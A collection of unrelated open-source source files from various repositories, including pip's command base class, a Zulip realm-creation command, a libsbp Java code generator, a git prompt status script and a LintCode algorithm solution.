keyw_str.append(BSH_KEYWORDS)
keyw_str.append(BCMD_KEYWORDS)
elif self.LangId == synglob.ID_LANG_KSH:
keyw_str.append(KSH_KEYWORDS)
keyw_str.append(KCMD_KEYWORDS)
else:
pass
keywords.append((0, " ".join(keyw_str)))
return keywords
def GetSyntaxSpec(self):
"""Syntax Specifications """
return SYNTAX_ITEMS
def GetProperties(self):
"""Returns a list of Extra Properties to set """
return [FOLD, FLD_COMMENT, FLD_COMPACT]
def GetCommentPattern(self):
"""Returns a list of characters used to comment a block of code """
return [u'#']
|
paweljasinski/ironpython3
|
refs/heads/master
|
Tests/interop/net/__init__.py
|
3
|
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
'''
-------------------------------------------------------------------------------
OVERVIEW
The goal of this test package is to provide a framework to exhaustively
verify IronPython's .NET interop capabilities. From a high-level, this means
we will be checking that:
- IronPython can utilize objects and types that have been implemented in some
other CLR-supported language. The goal here is to test all language features
of IL
- other CLR-supported languages can utilize IronPython objects and types via
the DLR hosting APIs and the new 'dynamic' keyword in C-sharp. Please note
that the goal of this testing is to find bugs in IronPython's IDynamicObject
implementation(s); not other CLR-supported languages' utilization of IDynamic
objects. A test plan specifically for this scenario has been created by the
DLR - see the "Testing Cross Language Operations on the DLR" document.
While there are other key testing aspects, at the highest level utilization of
.NET types from IronPython can be broken up into three key areas:
- getting .NET types
- creating instances of .NET types and performing operations on them
- subclassing/implementing .NET classes/interfaces from Python
EDITORS NOTE
Throughout this document you will find references to documentation in
other packages similar to "See documentation for interop.net.field". This simply
means that relative to this package (i.e., interop.net), you should follow
the 'field (package)' link at the bottom of this page.
------------------------------------------------------------------------------
GETTING THE .NET TYPE
KEY POINTS
* Can you get a type and how?
* What should happen when a naming conflict occurs?
- Merge or simply replace
- Possible conflicts:
* .NET namespace
* Type name
* Generics
* IronPython module
* When is the type "visible"? When should it be "invisible"?
INTERESTING TYPES
See documentation for interop.net.type
-------------------------------------------------------------------------------
UTILIZATION OF .NET OBJECTS
TYPES
See documentation for interop.net.type
METHODS
See documentation for interop.net.method
FIELDS
See documentation for interop.net.field
PROPERTIES/INDEXERS
See documentation for interop.net.property
EVENTS/DELEGATES
See documentation for interop.net.event
-------------------------------------------------------------------------------
DERIVING FROM .NET TYPES
See documentation for interop.net.derivation.
-------------------------------------------------------------------------------
PYTHON CHARACTERISTICS OF .NET OBJECTS
* standard attributes (i.e., __init__, __doc__, etc)
* help and documentation strings
* dir(xyz) vs. getattr(xyz, 'abc') vs. xyz.abc - all three should have
equivalent results
* setattr(xyz, 'abc', foo) vs xyz.abc = foo - should have equivalent results
* look at interop.com.dlrcomlib.pytraits for more ideas
-------------------------------------------------------------------------------
PERFORMANCE
To be revisited.
* simple method invocations
* importing from .NET namespaces
* loading assemblies
-------------------------------------------------------------------------------
STRESS
* run .NET interop tests with gcstress environment variables set
* run .NET interop tests with Managed Debugging Assistants turned on
* run .NET interop tests with IronPython/DLR binaries installed into the
global assembly cache
* check for memory leaks
* huge number of method parameters on a .NET method
-------------------------------------------------------------------------------
LOCALIZATION/GLOBALIZATION
To be revisited.
* tests should be run on a non-ENU operating system
-------------------------------------------------------------------------------
DEBUGGING EXPERIENCE
To be revisited. No special requirements?
-------------------------------------------------------------------------------
COMPATIBILITY
* does the latest version of IronPython pass the previous version's .NET
interop tests?
* is IronPython compatible with Python for .NET (http://pythonnet.sourceforge.net/)?
* is .NET interop the same under x86 and x64 CLR?
* is .NET interop the same under different operating systems?
* is .NET interop the same under interactive sessions versus Python modules?
-------------------------------------------------------------------------------
SECURITY
To be revisited. As IronPython is quite simply just another .NET program
running under the Common Language Runtime, CLR threat models should apply.
-------------------------------------------------------------------------------
CODE COVERAGE
Block coverage of the .NET binder should be maintained at 80% or higher. As of
May 2009, the .NET binder resides in the IronPython.Runtime.Binding namespace
and we're sitting at 88.8% block coverage.
-------------------------------------------------------------------------------
ACCESSIBILITY
To be revisited.
-------------------------------------------------------------------------------
MISC. INTERESTING CASES
* Are certain CLR Exceptions interchangeable with Python builtin exceptions?
* How does IronPython treat the following types:
- IList, List, ArrayList
- Hashtable, Dictionary`2, IDictionary
- IEnumerable, IEnumerator
- IComparable
* Operations on .NET namespaces
- the top level
- the nested level
- the bottom level
* Operations on nested classes
* Operations on the Assembly/AssemblyBuilder type and instances
Special DLR Types
* Extensible<T> - Python currently provides implementations for a bunch of
members on the Extensible type (for some types) but they shouldn't be
  necessary. A raw Extensible<Xyz> should behave the same as an Xyz
-------------------------------------------------------------------------------
EXISTING TESTS WHICH NEED TO BE FOLDED INTO interop.net:
* test_cliclass.py
* test_delegate.py
* test_inheritance.py
* test_methodbinder1.py
* test_methodbinder2.py
* test_methoddispatch.py
* test_static.py
-------------------------------------------------------------------------------
AREAS TARGETED FOR MORE TEST COVERAGE (February 2009)
* .NET classes created using Visual Basic which use IL features that cannot
presently be hit from C#-based assemblies
- optional parameters
* running __builtin__ methods (isinstance, issubclass, len, help, dir, etc)
against .NET types/objects
* Python methods attached to .NET types:
- Dictionary().next()
- Indexing on System.Xml.XmlDocument().SelectSingleNode(...).Attributes["something"] (DefaultMemberAttribute)
- __cmp__, __lt__, __gt__, etc when one operand is a native Python type
* Event handlers implemented in Python:
- removing
- re-attaching
- memory leaks
- anything callable in Python should be capable of being used as a delegate
* Passing various Python objects to C# functions:
- new-style class dictionaries used as IDictionary
- setting integer properties with Python longs
- objects implementing special methods such __int__
- list objects should not be usable for IEnumerators
* Public vs protected methods with ref/out parameters
* .NET 4.0 features
-------------------------------------------------------------------------------
EXECUTION PLAN
To be revisited when more test resources become available.
'''
|
sailfish-sdk/sailfish-qtcreator
|
refs/heads/master
|
tests/system/tools/objectsToTable.py
|
6
|
#!/usr/bin/env python
############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import sys
from optparse import OptionParser
from toolfunctions import checkDirectory
from toolfunctions import getFileContent
def parseCommandLine():
global directory, tsv
parser = OptionParser("\n%prog [OPTIONS] [DIRECTORY]")
parser.add_option("-t", "--tab-separated", dest="tsv",
action="store_true", default=False,
help="write a tab-separated table")
(options, args) = parser.parse_args()
if len(args) == 0:
directory = os.path.abspath(".")
elif len(args) == 1:
directory = os.path.abspath(args[0])
else:
print "\nERROR: Too many arguments\n"
parser.print_help()
sys.exit(1)
tsv = options.tsv
def readProperties(line):
def readOneProperty(rawProperties):
name, rawProperties = rawProperties.split("=", 1)
value, rawProperties = rawProperties.split("'", 2)[1:3]
# we want something human-readable so I think
# we can live with some imprecision
return name.strip(" ~?"), value, rawProperties
objectName, rawProperties = line.split("\t")
rawProperties = rawProperties.strip("{}")
properties = {}
while len(rawProperties) > 0:
name, value, rawProperties = readOneProperty(rawProperties)
properties[name] = value
return objectName, properties
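# Hedged illustration (not in the original tool): a fabricated objects.map
# line in the format readProperties expects -- a tab-separated Squish name
# and a brace-wrapped, quote-delimited property list.
def _read_properties_demo():
    name, props = readProperties(":Some_Button\t{text='OK' type='Button'}")
    assert name == ":Some_Button"
    assert props == {"text": "OK", "type": "Button"}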
def main():
global directory, tsv
objMap = checkDirectory(directory)
objects = dict(map(readProperties, getFileContent(objMap).splitlines()))
# Which properties have been used at least once?
eachObjectsProperties = [set(properties.keys()) for properties in objects.values()]
usedProperties = list(reduce(lambda x,y: x | y, eachObjectsProperties))
if tsv:
print "\t".join(["Squish internal name"] + usedProperties)
for name, properties in objects.items():
values = [name] + map(lambda x: properties.setdefault(x, ""), usedProperties)
print "\t".join(values)
else:
maxPropertyLength = max(map(len, usedProperties))
for name, properties in objects.items():
print "Squish internal name: %s" % name
print "Properties:"
for key, val in properties.items():
print "%s: %s" % (key.rjust(maxPropertyLength + 4), val)
print
return 0
if __name__ == '__main__':
parseCommandLine()
sys.exit(main())
|
dsajkl/123
|
refs/heads/master
|
lms/lib/xblock/field_data.py
|
63
|
"""
:class:`~xblock.field_data.FieldData` subclasses used by the LMS
"""
from xblock.field_data import ReadOnlyFieldData, SplitFieldData
from xblock.fields import Scope
class LmsFieldData(SplitFieldData):
"""
A :class:`~xblock.field_data.FieldData` that
reads all UserScope.ONE and UserScope.ALL fields from `student_data`
and all UserScope.NONE fields from `authored_data`. It also prevents
writing to `authored_data`.
"""
def __init__(self, authored_data, student_data):
# Make sure that we don't repeatedly nest LmsFieldData instances
if isinstance(authored_data, LmsFieldData):
authored_data = authored_data._authored_data # pylint: disable=protected-member
else:
authored_data = ReadOnlyFieldData(authored_data)
self._authored_data = authored_data
self._student_data = student_data
super(LmsFieldData, self).__init__({
Scope.content: authored_data,
Scope.settings: authored_data,
Scope.parent: authored_data,
Scope.children: authored_data,
Scope.user_state_summary: student_data,
Scope.user_state: student_data,
Scope.user_info: student_data,
Scope.preferences: student_data,
})
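# Minimal usage sketch (illustrative; `authored` and `student` stand in
# for real FieldData instances supplied by the runtime):
#
#   field_data = LmsFieldData(authored, student)
#
# Scope.settings reads then hit `authored` (wrapped read-only), while
# Scope.user_state reads and writes hit `student`.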
|
aaleotti-unimore/ComicsScraper
|
refs/heads/master
|
lib/packaging/utils.py
|
1126
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import re
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
# This is taken from PEP 503.
return _canonicalize_regex.sub("-", name).lower()
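# Hedged example of the PEP 503 normalization above: runs of '-', '_' and
# '.' collapse to a single '-', and the result is lowercased.
def _canonicalize_name_demo():
    assert canonicalize_name("Foo__Bar.baz") == "foo-bar-baz"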
|
benschmaus/catapult
|
refs/heads/master
|
telemetry/telemetry/story/__init__.py
|
8
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from py_utils import cloud_storage # pylint: disable=import-error
from telemetry.story.shared_state import SharedState
from telemetry.story.story import Story
from telemetry.story.story_filter import StoryFilter
from telemetry.story.story_set import StorySet
PUBLIC_BUCKET = cloud_storage.PUBLIC_BUCKET
PARTNER_BUCKET = cloud_storage.PARTNER_BUCKET
INTERNAL_BUCKET = cloud_storage.INTERNAL_BUCKET
|
ttglennhall/DjangoGirlsTutorial
|
refs/heads/master
|
myvenv/lib/python3.4/site-packages/pip/basecommand.py
|
392
|
"""Base Command class, and related routines"""
import os
import sys
import tempfile
import traceback
import time
import optparse
from pip import cmdoptions
from pip.locations import running_under_virtualenv
from pip.log import logger
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.backwardcompat import StringIO
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.status_codes import (SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR)
from pip.util import get_prog
__all__ = ['Command']
class Command(object):
name = None
usage = None
hidden = False
def __init__(self):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(cmdoptions.general_group, self.parser)
self.parser.add_option_group(gen_opts)
def _build_session(self, options):
session = PipSession()
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle timeouts
if options.timeout:
session.timeout = options.timeout
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def setup_logging(self):
pass
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
level = 1 # Notify
level += options.verbose
level -= options.quiet
level = logger.level_for_integer(4 - level)
complete_log = []
logger.add_consumers(
(level, sys.stdout),
(logger.DEBUG, complete_log.append),
)
if options.log_explicit_levels:
logger.explicit_levels = True
self.setup_logging()
#TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.fatal('Could not find an activated virtualenv (required).')
sys.exit(VIRTUALENV_NOT_FOUND)
if options.log:
log_fp = open_logfile(options.log, 'a')
logger.add_consumers((logger.DEBUG, log_fp))
else:
log_fp = None
exit = SUCCESS
store_log = False
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
exit = status
except PreviousBuildDirError:
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError):
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except BadCommand:
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except CommandError:
e = sys.exc_info()[1]
logger.fatal('ERROR: %s' % e)
logger.info('Exception information:\n%s' % format_exc())
exit = ERROR
except KeyboardInterrupt:
logger.fatal('Operation cancelled by user')
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except:
logger.fatal('Exception:\n%s' % format_exc())
store_log = True
exit = UNKNOWN_ERROR
if store_log:
log_file_fn = options.log_file
text = '\n'.join(complete_log)
try:
log_file_fp = open_logfile(log_file_fn, 'w')
except IOError:
temp = tempfile.NamedTemporaryFile(delete=False)
log_file_fn = temp.name
log_file_fp = open_logfile(log_file_fn, 'w')
logger.fatal('Storing debug log for failure in %s' % log_file_fn)
log_file_fp.write(text)
log_file_fp.close()
if log_fp is not None:
log_fp.close()
return exit
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
def open_logfile(filename, mode='a'):
"""Open the named log file in append mode.
If the file already exists, a separator will also be printed to
the file to separate past activity from current activity.
"""
filename = os.path.expanduser(filename)
filename = os.path.abspath(filename)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
exists = os.path.exists(filename)
log_fp = open(filename, mode)
if exists:
log_fp.write('%s\n' % ('-' * 60))
log_fp.write('%s run on %s\n' % (sys.argv[0], time.strftime('%c')))
return log_fp
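# Hedged usage sketch (path is a placeholder): repeated runs append to the
# same file, separated by the dashed banner written above.
#   fp = open_logfile('/tmp/pip-demo.log')
#   fp.write('hello\n')
#   fp.close()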
|
IV-GII/Django_Traduccion
|
refs/heads/master
|
allauth/socialaccount/providers/google/views.py
|
20
|
import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from .provider import GoogleProvider
class GoogleOAuth2Adapter(OAuth2Adapter):
provider_id = GoogleProvider.id
access_token_url = 'https://accounts.google.com/o/oauth2/token'
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
profile_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token,
'alt': 'json'})
extra_data = resp.json()
login = self.get_provider() \
.sociallogin_from_response(request,
extra_data)
return login
oauth2_login = OAuth2LoginView.adapter_view(GoogleOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(GoogleOAuth2Adapter)
|
sudotliu/oh-my-zsh
|
refs/heads/master
|
plugins/git-prompt/gitstatus.py
|
343
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from subprocess import Popen, PIPE
import re
# change those symbols to whatever you prefer
symbols = {
'ahead of': '↑',
'behind': '↓',
'staged': '♦',
'changed': '‣',
'untracked': '…',
'clean': '⚡',
'unmerged': '≠',
'sha1': ':'
}
output, error = Popen(
['git', 'status'], stdout=PIPE, stderr=PIPE, universal_newlines=True).communicate()
if error:
import sys
sys.exit(0)
lines = output.splitlines()
behead_re = re.compile(
r"^# Your branch is (ahead of|behind) '(.*)' by (\d+) commit")
diverge_re = re.compile(r"^# and have (\d+) and (\d+) different")
status = ''
staged = re.compile(r'^# Changes to be committed:$', re.MULTILINE)
changed = re.compile(r'^# Changed but not updated:$', re.MULTILINE)
untracked = re.compile(r'^# Untracked files:$', re.MULTILINE)
unmerged = re.compile(r'^# Unmerged paths:$', re.MULTILINE)
def execute(*command):
    out, err = Popen(*command, stdout=PIPE, stderr=PIPE).communicate()
if not err:
nb = len(out.splitlines())
else:
nb = '?'
return nb
if staged.search(output):
nb = execute(
['git', 'diff', '--staged', '--name-only', '--diff-filter=ACDMRT'])
status += '%s%s' % (symbols['staged'], nb)
if unmerged.search(output):
nb = execute(['git', 'diff', '--staged', '--name-only', '--diff-filter=U'])
status += '%s%s' % (symbols['unmerged'], nb)
if changed.search(output):
nb = execute(['git', 'diff', '--name-only', '--diff-filter=ACDMRT'])
status += '%s%s' % (symbols['changed'], nb)
if untracked.search(output):
status += symbols['untracked']
if status == '':
status = symbols['clean']
remote = ''
bline = lines[0]
if bline.find('Not currently on any branch') != -1:
branch = symbols['sha1'] + Popen([
'git',
'rev-parse',
'--short',
'HEAD'], stdout=PIPE).communicate()[0][:-1]
else:
branch = bline.split(' ')[-1]
bstatusline = lines[1]
match = behead_re.match(bstatusline)
if match:
remote = symbols[match.groups()[0]]
remote += match.groups()[2]
elif lines[2:]:
div_match = diverge_re.match(lines[2])
if div_match:
remote = "{behind}{1}{ahead of}{0}".format(
*div_match.groups(), **symbols)
print('\n'.join([branch, remote, status]))
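# The three lines printed above feed the shell prompt; a fabricated
# example (branch name, ahead/behind marker, per-category counts):
#   master
#   ↑2
#   ♦1‣3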
|
HesselTjeerdsma/Cyber-Physical-Pacman-Game
|
refs/heads/master
|
Algor/flask/bin/rst2odt_prepstyles.py
|
1
|
#!/home/hessel/Cyber-Physical-Pacman-Game/Algor/flask/bin/python2
# $Id: rst2odt_prepstyles.py 5839 2009-01-07 19:09:28Z dkuhlman $
# Author: Dave Kuhlman <dkuhlman@rexx.com>
# Copyright: This module has been placed in the public domain.
"""
Fix a word-processor-generated styles.odt for odtwriter use: Drop page size
specifications from styles.xml in STYLE_FILE.odt.
"""
#
# Author: Michael Schutte <michi@uiae.at>
from lxml import etree
import sys
import zipfile
from tempfile import mkstemp
import shutil
import os
NAMESPACES = {
"style": "urn:oasis:names:tc:opendocument:xmlns:style:1.0",
"fo": "urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"
}
def prepstyle(filename):
zin = zipfile.ZipFile(filename)
styles = zin.read("styles.xml")
root = etree.fromstring(styles)
for el in root.xpath("//style:page-layout-properties",
namespaces=NAMESPACES):
for attr in el.attrib:
if attr.startswith("{%s}" % NAMESPACES["fo"]):
del el.attrib[attr]
tempname = mkstemp()
zout = zipfile.ZipFile(os.fdopen(tempname[0], "w"), "w",
zipfile.ZIP_DEFLATED)
for item in zin.infolist():
if item.filename == "styles.xml":
zout.writestr(item, etree.tostring(root))
else:
zout.writestr(item, zin.read(item.filename))
zout.close()
zin.close()
shutil.move(tempname[1], filename)
def main():
args = sys.argv[1:]
if len(args) != 1:
print >> sys.stderr, __doc__
print >> sys.stderr, "Usage: %s STYLE_FILE.odt\n" % sys.argv[0]
sys.exit(1)
filename = args[0]
prepstyle(filename)
if __name__ == '__main__':
main()
# vim:tw=78:sw=4:sts=4:et:
|
adnanh/zulip
|
refs/heads/master
|
zerver/management/commands/create_realm.py
|
115
|
from __future__ import absolute_import
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_create_realm, set_default_streams
from zerver.models import RealmAlias
if not settings.VOYAGER:
from zilencer.models import Deployment
import re
import sys
class Command(BaseCommand):
help = """Create a realm for the specified domain.
Usage: python manage.py create_realm --domain=foo.com --name='Foo, Inc.'"""
option_list = BaseCommand.option_list + (
make_option('-o', '--open-realm',
dest='open_realm',
action="store_true",
default=False,
help='Make this an open realm.'),
make_option('-d', '--domain',
dest='domain',
type='str',
help='The domain for the realm.'),
make_option('-n', '--name',
dest='name',
type='str',
help='The user-visible name for the realm.'),
make_option('--deployment',
dest='deployment_id',
type='int',
default=None,
help='Optionally, the ID of the deployment you want to associate the realm with.'),
)
def validate_domain(self, domain):
# Domains can't contain whitespace if they are to be used in memcached
# keys.
        if re.search(r"\s", domain):
raise ValueError("Domains can't contain whitespace")
# Domains must look like domains, ie have the structure of
# <subdomain(s)>.<tld>. One reason for this is that bots need
# to have valid looking emails.
if len(domain.split(".")) < 2:
raise ValueError("Domains must contain a '.'")
if RealmAlias.objects.filter(domain=domain).count() > 0:
raise ValueError("Cannot create a new realm that is already an alias for an existing realm")
def handle(self, *args, **options):
if options["domain"] is None or options["name"] is None:
print >>sys.stderr, "\033[1;31mPlease provide both a domain and name.\033[0m\n"
self.print_help("python manage.py", "create_realm")
exit(1)
if options["open_realm"] and options["deployment_id"] is not None:
print >>sys.stderr, "\033[1;31mExternal deployments cannot be open realms.\033[0m\n"
self.print_help("python manage.py", "create_realm")
exit(1)
if options["deployment_id"] is not None and settings.VOYAGER:
print >>sys.stderr, "\033[1;31mExternal deployments are not supported on voyager deployments.\033[0m\n"
exit(1)
domain = options["domain"]
name = options["name"]
self.validate_domain(domain)
realm, created = do_create_realm(
domain, name, restricted_to_domain=not options["open_realm"])
if created:
print domain, "created."
if options["deployment_id"] is not None:
deployment = Deployment.objects.get(id=options["deployment_id"])
deployment.realms.add(realm)
deployment.save()
print "Added to deployment", str(deployment.id)
elif settings.ZULIP_COM:
deployment = Deployment.objects.get(base_site_url="https://zulip.com/")
deployment.realms.add(realm)
deployment.save()
# In the else case, we are not using the Deployments feature.
set_default_streams(realm, ["social", "engineering"])
print "\033[1;36mDefault streams set to social,engineering,zulip!\033[0m"
else:
print domain, "already exists."
|
yuweijun/learning-programming
|
refs/heads/master
|
language-python/count_lines.py
|
1
|
#! /usr/bin/python
import sys
data = sys.stdin.readlines()
print "counted", len(data), "lines."
|
swift-nav/libsbp
|
refs/heads/master
|
generator/sbpg/targets/java.py
|
6
|
#!/usr/bin/env python
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: Bhaskar Mookerji <mookerji@swiftnav.com>
#
# This source is subject to the license found in the file 'LICENSE' which must
# be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""Generator for Java target.
This module consumes the YAML spec and generates Java code in the
target directory.
"""
import os
import os.path
from sbpg.targets.templating import JENV, ACRONYMS
TEMPLATE_NAME = "sbp_java.java.j2"
TEMPLATE_TABLE_NAME = "MessageTable.java.j2"
JAVA_TYPE_MAP = {'u8': 'int',
'u16': 'int',
'u32': 'long',
'u64': 'long',
's8': 'int',
's16': 'int',
's32': 'int',
's64': 'long',
'float': 'float',
'double': 'double',
'string': 'String'}
field_sizes = {
'u8' : 1,
'u16' : 2,
'u32' : 4,
'u64' : 8,
's8' : 1,
's16' : 2,
's32' : 4,
's64' : 8,
'float' : 4,
'double' : 8,
}
def classnameify(s):
"""
Makes a classname.
"""
return ''.join(w if w in ACRONYMS else w.title() for w in s.split('_'))
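# Hedged illustration (assuming neither word is in ACRONYMS):
#   classnameify('msg_obs')  ->  'MsgObs'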
def commentify(value):
"""
Builds a comment.
"""
if value is None:
return
if len(value.split('\n')) == 1:
return "* " + value
else:
return '\n'.join([' * ' + l for l in value.split('\n')[:-1]])
def type_map(field):
if JAVA_TYPE_MAP.has_key(field.type_id):
return JAVA_TYPE_MAP[field.type_id]
elif field.type_id == 'array':
t = field.options['fill'].value
return JAVA_TYPE_MAP.get(t, t) + '[]'
else:
return field.type_id
def parse_type(field):
"""
Function to pull a type from the binary payload.
"""
if field.type_id == 'string':
if field.options.has_key('size'):
return "parser.getString(%d)" % field.options['size'].value
else:
return "parser.getString()"
elif field.type_id in JAVA_TYPE_MAP.keys():
# Primitive java types have extractor methods in SBPMessage.Parser
return "parser.get" + field.type_id.capitalize() + "()"
    elif field.type_id == 'array':
# Call function to build array
t = field.options['fill'].value
if t in JAVA_TYPE_MAP.keys():
if field.options.has_key('size'):
return "parser.getArrayof%s(%d)" % (t.capitalize(), field.options['size'].value)
else:
return "parser.getArrayof%s()" % t.capitalize()
else:
if field.options.has_key('size'):
return "parser.getArray(%s.class, %d)" % (t, field.options['size'].value)
else:
return "parser.getArray(%s.class)" % t
else:
# This is an inner class, call default constructor
return "new %s().parse(parser)" % field.type_id
def build_type(field):
"""
Function to pack a type into the binary payload.
"""
if field.type_id == 'string':
if field.options.has_key('size'):
return "builder.putString(%s, %d)" % (field.identifier, field.options['size'].value)
else:
return "builder.putString(%s)" % field.identifier
elif field.type_id in JAVA_TYPE_MAP.keys():
# Primitive java types have extractor methods in SBPMessage.Builder
return "builder.put%s(%s)" % (field.type_id.capitalize(), field.identifier)
    elif field.type_id == 'array':
# Call function to build array
t = field.options['fill'].value
if t in JAVA_TYPE_MAP.keys():
if field.options.has_key('size'):
return "builder.putArrayof%s(%s, %d)" % (t.capitalize(),
field.identifier,
field.options['size'].value)
else:
return "builder.putArrayof%s(%s)" % (t.capitalize(), field.identifier)
else:
if field.options.has_key('size'):
return "builder.putArray(%s, %d)" % (field.identifier, field.options['size'].value)
else:
return "builder.putArray(%s)" % field.identifier
else:
return "%s.build(builder)" % field.identifier
def jsonify(field):
if field.type_id in JAVA_TYPE_MAP.keys():
return field.identifier
elif field.type_id == 'array':
if field.options['fill'].value in JAVA_TYPE_MAP.keys():
return "new JSONArray(%s)" % field.identifier
else:
return "SBPStruct.toJSONArray(%s)" % field.identifier
else:
return field.identifier + ".toJSON()"
JENV.filters['classnameify'] = classnameify
JENV.filters['commentify'] = commentify
JENV.filters['type_map'] = type_map
JENV.filters['parse_type'] = parse_type
JENV.filters['build_type'] = build_type
JENV.filters['jsonify'] = jsonify
def render_source(output_dir, package_spec, jenv=JENV):
"""
Render and output
"""
path, module_name = package_spec.filepath
java_template = jenv.get_template(TEMPLATE_NAME)
module_path = "com." + package_spec.identifier
yaml_filepath = "/".join(package_spec.filepath) + ".yaml"
includes = [".".join(i.split(".")[:-1]) for i in package_spec.includes]
includes = [i for i in includes if i != "types"]
for msg in package_spec.definitions:
msg_name = classnameify(msg.identifier) if msg.sbp_id else msg.identifier
l = "/".join(package_spec.filepath)
    destination_filename = "%s/com/%s/%s.java" % (output_dir, l, msg_name)
# Create the output directory if it doesn't exist
if not os.path.exists(os.path.dirname(destination_filename)):
os.mkdir(os.path.dirname(destination_filename))
with open(destination_filename, 'w+') as f:
print destination_filename
f.write(java_template.render(m=msg,
filepath=yaml_filepath,
module_path=module_path,
include=includes,
description=package_spec.description))
def render_table(output_dir, packages, jenv=JENV):
"""
Render and output dispatch table
"""
destination_filename = output_dir + "/com/swiftnav/sbp/client/MessageTable.java"
with open(destination_filename, 'w+') as f:
print destination_filename
f.write(jenv.get_template(TEMPLATE_TABLE_NAME).render(packages=packages))
|
algorhythms/LintCode
|
refs/heads/master
|
Count of Smaller Number.py
|
4
|
"""
Give you an integer array (index from 0 to n-1, where n is the size of this array, value from 0 to 10000) and a query
list. For each query, given an integer, return the number of elements in the array that are smaller than the given
integer.
Example
For array [1,2,7,8,5], and queries [1,8,5], return [0,4,2]
Note
We suggest you finish problem Segment Tree Build and Segment Tree Query II first.
Challenge
Could you solve it in three ways?
Just loop
Sort and binary search
Build Segment Tree and Search.
"""
__author__ = 'Daniel'
class Solution:
def countOfSmallerNumber(self, A, queries):
# return self.loop(A, queries)
return self.search(A, queries)
def loop(self, A, queries):
"""
O(N*k)
"""
cnt = dict(zip(queries, [0 for _ in queries]))
for elt in A:
for k in cnt.keys():
if elt<k:
cnt[k] += 1
return [cnt[i] for i in queries]
def search(self, A, queries):
"""
O(nlgn + klgn)
"""
A.sort()
ret = []
for q in queries:
ind = self.bin_search(A, q)
while ind>=0 and A[ind]==q:
ind -= 1
ret.append(ind+1)
return ret
def bin_search(self, A, t):
b = 0
e = len(A)
while b<e:
            m = (b+e)//2  # integer midpoint (works on both Python 2 and 3)
if t==A[m]:
return m
elif t < A[m]:
e = m
else:
b = m+1
return b-1
def segment_tree(self, A, queries):
# TODO
pass
